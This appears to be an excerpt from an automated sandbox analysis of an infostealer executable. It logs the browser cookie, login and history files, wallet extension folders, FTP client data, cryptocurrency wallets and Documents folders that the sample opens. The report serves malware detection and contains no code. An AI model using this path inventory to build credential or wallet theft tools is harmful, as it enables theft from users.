                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
